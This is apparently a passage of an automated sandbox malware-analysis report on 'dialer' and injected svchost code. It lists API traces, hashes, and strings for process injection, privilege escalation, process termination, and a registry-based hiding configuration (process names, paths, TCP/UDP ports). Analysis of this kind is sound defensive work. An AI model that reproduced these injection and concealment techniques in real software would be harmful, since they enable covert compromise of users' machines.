                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3676546796-0
                                                                                                                            • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                            • Instruction ID: e8c851af053773b4345d5d4def8709d170a1e098659e94d0762549485f88ead0
                                                                                                                            • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                            • Instruction Fuzzy Hash: F8114233B0CA5246E718FF27A85452A7761FB85B86F644038DA4A87759CE7EE4818A40

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,?,00007FF64295238B,?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642951801
                                                                                                                            • HeapAlloc.KERNEL32(?,00000000,?,00007FF64295238B,?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642951812
                                                                                                                              • Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295150B
                                                                                                                              • Part of subcall function 00007FF6429514D8: HeapAlloc.KERNEL32 ref: 00007FF64295151E
                                                                                                                              • Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295152C
                                                                                                                              • Part of subcall function 00007FF6429514D8: HeapAlloc.KERNEL32 ref: 00007FF64295153D
                                                                                                                              • Part of subcall function 00007FF6429514D8: K32EnumProcesses.KERNEL32 ref: 00007FF642951557
                                                                                                                              • Part of subcall function 00007FF6429514D8: OpenProcess.KERNEL32 ref: 00007FF642951585
                                                                                                                              • Part of subcall function 00007FF6429514D8: K32EnumProcessModules.KERNEL32 ref: 00007FF6429515AA
                                                                                                                              • Part of subcall function 00007FF6429514D8: ReadProcessMemory.KERNELBASE ref: 00007FF6429515E1
                                                                                                                              • Part of subcall function 00007FF6429514D8: CloseHandle.KERNELBASE ref: 00007FF64295161D
                                                                                                                              • Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295162F
                                                                                                                              • Part of subcall function 00007FF6429514D8: HeapFree.KERNEL32 ref: 00007FF64295163D
                                                                                                                              • Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF642951643
                                                                                                                              • Part of subcall function 00007FF6429514D8: HeapFree.KERNEL32 ref: 00007FF642951651
                                                                                                                            • OpenProcess.KERNEL32 ref: 00007FF642951859
                                                                                                                            • TerminateProcess.KERNELBASE ref: 00007FF64295186C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF642951875
                                                                                                                            • GetProcessHeap.KERNEL32 ref: 00007FF642951885
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1323846700-0
                                                                                                                            • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                            • Instruction ID: e88442ca17796abffd66c535d00acc49da7a4be97c62e9142cf75eb72360fc80
                                                                                                                            • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                            • Instruction Fuzzy Hash: F2117522F0D64296EB15FF27A854069A7A1AF89B8EF284034DE0DC3756DE7EE4C58704

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 173 7ff642951914-7ff642951932 GetModuleHandleA 174 7ff64295193d-7ff642951942 173->174 175 7ff642951934-7ff642951937 GetProcAddress 173->175 175->174
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: ntdll.dll
                                                                                                                            • API String ID: 1646373207-2227199552
                                                                                                                            • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                            • Instruction ID: a29b4b4815024b617159393710f8ff3a59fdd4569b61e53a9bba2427975aa9ca
                                                                                                                            • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                            • Instruction Fuzzy Hash: 70D0C756B1D50792EE197773686403493915F5874EFD44030CD1EC6352DE6DD0D58604

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandleOpenWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 10462204-0
                                                                                                                            • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                            • Instruction ID: 20d63f1508588696d71c566d7830035c378d1612da68280f37d78186c814ad2d
                                                                                                                            • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                            • Instruction Fuzzy Hash: 47F06D22B0C78282EB14AF27B480129A360EB88BC5F549038EA8DC3759DF7ED4C48704

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF64295226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295228F
                                                                                                                              • Part of subcall function 00007FF64295226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295229F
                                                                                                                              • Part of subcall function 00007FF64295226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF6429522B9
                                                                                                                              • Part of subcall function 00007FF64295226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6429522D0
                                                                                                                              • Part of subcall function 00007FF64295226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF642952308
                                                                                                                              • Part of subcall function 00007FF64295226C: GetLastError.KERNEL32 ref: 00007FF642952312
                                                                                                                              • Part of subcall function 00007FF64295226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295231B
                                                                                                                              • Part of subcall function 00007FF64295226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295232F
                                                                                                                              • Part of subcall function 00007FF64295226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952346
                                                                                                                              • Part of subcall function 00007FF64295226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295235F
                                                                                                                              • Part of subcall function 00007FF64295226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952371
                                                                                                                              • Part of subcall function 00007FF64295226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295237E
                                                                                                                              • Part of subcall function 00007FF64295226C: RegCreateKeyExW.KERNELBASE ref: 00007FF6429523BE
                                                                                                                              • Part of subcall function 00007FF64295226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6429523E5
                                                                                                                              • Part of subcall function 00007FF64295226C: RegSetKeySecurity.KERNELBASE ref: 00007FF6429523FE
                                                                                                                              • Part of subcall function 00007FF64295226C: LocalFree.KERNEL32 ref: 00007FF642952408
                                                                                                                            • ExitProcess.KERNEL32 ref: 00007FF642952263
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3836936051-0
                                                                                                                            • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                            • Instruction ID: 8cd8186dff7998c93ed4246d65dbb9552f7e537e77aff332b0e6e3b854221569
                                                                                                                            • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                            • Instruction Fuzzy Hash: 78A00117F2E54286EA0C37B6685A06863616F94A0BFA00434D00AC6293DDAE64958659
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                                            • String ID: SOFTWARE$dialerstager$open
                                                                                                                            • API String ID: 3276259517-3931493855
                                                                                                                            • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                            • Instruction ID: 23960c666bafcd568905e2b8868c0350984c62414abd2870668fd7f32f1cddc1
                                                                                                                            • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                            • Instruction Fuzzy Hash: 55D18423F0C5828AEB39BB3698002B96355FF4478EF640135E94DC7696DEBEE684C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3462610200-2766056989
                                                                                                                            • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                            • Instruction ID: 877f6fdf73be500c286654b5a9f54828e54e97af2febf9302d6f446bd1816142
                                                                                                                            • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                            • Instruction Fuzzy Hash: BF51AD37B08A4186EB50EB22E84066E77A1FB48B8DF554135CE4DD3758DFB9E489C704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                            • String ID: dialersvc64
                                                                                                                            • API String ID: 4184240511-3881820561
                                                                                                                            • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                            • Instruction ID: 8d04bdc03abce4b35211887e75b1020e713789c3046ece7a8f03fe016d28c49f
                                                                                                                            • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                            • Instruction Fuzzy Hash: 71416F33708E8296E710AF6AE4442AD73B1FB84B8DF544135EE4D87A19DF79E185C304
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Delete$CloseEnumOpen
                                                                                                                            • String ID: SOFTWARE\dialerconfig
                                                                                                                            • API String ID: 3013565938-461861421
                                                                                                                            • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                            • Instruction ID: 9d69752461699108c131ea53d12c20e71e26c78e40b73c2561c62d13b006ff66
                                                                                                                            • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                            • Instruction Fuzzy Hash: 8E11B223B1CB8581E760AF32E8457B96364FF4475DF900225D60C86999DFBDD288CB08
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Write$CloseCreateHandle
                                                                                                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                            • API String ID: 148219782-3440882674
                                                                                                                            • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                            • Instruction ID: f3ebaa97cc68cc675c957ca744525dc187b10d59b6b4b934036d96134f913e1d
                                                                                                                            • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                            • Instruction Fuzzy Hash: 6711A333B18B5182E704AF22E408329A360FB89FE9F544235DA1983B95CFBDD585C744

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:0.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:74
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 14946 23af32b273c 14947 23af32b276a 14946->14947 14948 23af32b2858 LoadLibraryA 14947->14948 14949 23af32b28d4 14947->14949 14948->14947 14950 23af32e1abc 14955 23af32e1628 GetProcessHeap 14950->14955 14952 23af32e1ad2 Sleep SleepEx 14953 23af32e1acb 14952->14953 14953->14952 14954 23af32e1598 StrCmpIW StrCmpW 14953->14954 14954->14953 14956 23af32e1648 __std_exception_copy 14955->14956 15000 23af32e1268 GetProcessHeap 14956->15000 14958 23af32e1650 14959 23af32e1268 2 API calls 14958->14959 14960 23af32e1661 14959->14960 14961 23af32e1268 2 API calls 14960->14961 14962 23af32e166a 14961->14962 14963 23af32e1268 2 API calls 14962->14963 14964 23af32e1673 14963->14964 14965 23af32e168e RegOpenKeyExW 14964->14965 14966 23af32e18a6 14965->14966 14967 23af32e16c0 RegOpenKeyExW 14965->14967 14966->14953 14968 23af32e16e9 14967->14968 14969 23af32e16ff RegOpenKeyExW 14967->14969 15004 23af32e12bc RegQueryInfoKeyW 14968->15004 14971 23af32e1723 14969->14971 14972 23af32e173a RegOpenKeyExW 14969->14972 15015 23af32e104c RegQueryInfoKeyW 14971->15015 14975 23af32e1775 RegOpenKeyExW 14972->14975 14976 23af32e175e 14972->14976 14977 23af32e1799 14975->14977 14978 23af32e17b0 RegOpenKeyExW 14975->14978 14980 23af32e12bc 13 API calls 14976->14980 14981 23af32e12bc 13 API calls 14977->14981 14982 23af32e17d4 14978->14982 14983 23af32e17eb RegOpenKeyExW 14978->14983 14984 23af32e176b RegCloseKey 14980->14984 14985 23af32e17a6 RegCloseKey 14981->14985 14986 23af32e12bc 13 API calls 14982->14986 14987 23af32e1826 RegOpenKeyExW 14983->14987 14988 23af32e180f 14983->14988 14984->14975 14985->14978 14989 23af32e17e1 RegCloseKey 14986->14989 14991 23af32e1861 RegOpenKeyExW 14987->14991 14992 23af32e184a 14987->14992 14990 23af32e104c 5 API calls 14988->14990 14989->14983 14995 23af32e181c RegCloseKey 14990->14995 14993 23af32e1885 14991->14993 14994 23af32e189c RegCloseKey 14991->14994 14996 23af32e104c 5 API calls 14992->14996 14997 23af32e104c 5 API calls 14993->14997 14994->14966 14995->14987 14998 23af32e1857 RegCloseKey 14996->14998 14999 23af32e1892 RegCloseKey 14997->14999 14998->14991 14999->14994 15021 23af32f6168 15000->15021 15002 23af32e1283 GetProcessHeap 15003 23af32e12ae __std_exception_copy 15002->15003 15003->14958 15005 23af32e1327 GetProcessHeap 15004->15005 15006 23af32e148a RegCloseKey 15004->15006 15007 23af32e133e __std_exception_copy 15005->15007 15006->14969 15008 23af32e1476 GetProcessHeap HeapFree 15007->15008 15009 23af32e1352 RegEnumValueW 15007->15009 15011 23af32e13d3 GetProcessHeap 15007->15011 15012 23af32e141e lstrlenW GetProcessHeap 15007->15012 15013 23af32e13f3 GetProcessHeap HeapFree 15007->15013 15014 23af32e1443 StrCpyW 15007->15014 15023 23af32e152c 15007->15023 15008->15006 15009->15007 15011->15007 15012->15007 15013->15012 15014->15007 15016 23af32e11b5 RegCloseKey 15015->15016 15018 23af32e10bf __std_exception_copy 15015->15018 15016->14972 15017 23af32e10cf RegEnumValueW 15017->15018 15018->15016 15018->15017 15019 23af32e114e GetProcessHeap 15018->15019 15020 23af32e116e GetProcessHeap HeapFree 15018->15020 15019->15018 15020->15018 15022 23af32f6177 15021->15022 15024 23af32e157c 15023->15024 15027 23af32e1546 15023->15027 15024->15007 15025 23af32e1565 StrCmpW 15025->15027 15026 23af32e155d StrCmpIW 15026->15027 15027->15024 15027->15025 15027->15026

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: ee723ffc3aa04360758a76d5d7d100dccbb7a60cfb46d6529805fec6e03ef3e0
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: 57711B26310A1086EB149F36E85969D7368FBA4F88F401135DD8E47FA8DF3EC684C741

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: bfc441e202b70e990e34d141dd28dcd24dd31b6297016785c974490ec41ce35d
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: 3211617061064082F7689721F88EB69A39CBF7474AF584138AADA81DD1EF7FC3C48752

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0000023AF32E1628: GetProcessHeap.KERNEL32 ref: 0000023AF32E1633
                                                                                                                              • Part of subcall function 0000023AF32E1628: HeapAlloc.KERNEL32 ref: 0000023AF32E1642
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16B2
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16DF
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E16F9
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1719
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1734
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1754
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E176F
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E178F
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E17AA
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E17CA
                                                                                                                            • Sleep.KERNEL32 ref: 0000023AF32E1AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 0000023AF32E1ADD
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E17E5
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1805
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1820
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1840
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E185B
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E187B
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1896
                                                                                                                              • Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E18A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: d293a7ecf22ae8c07a26979ff054afc44229310735744583370fa13e0ba43a09
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: 8331F16120064141FF58DB26DA4A3A993ACAF64BC4F0854359E8D87FD9FF1EE6D1C212

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
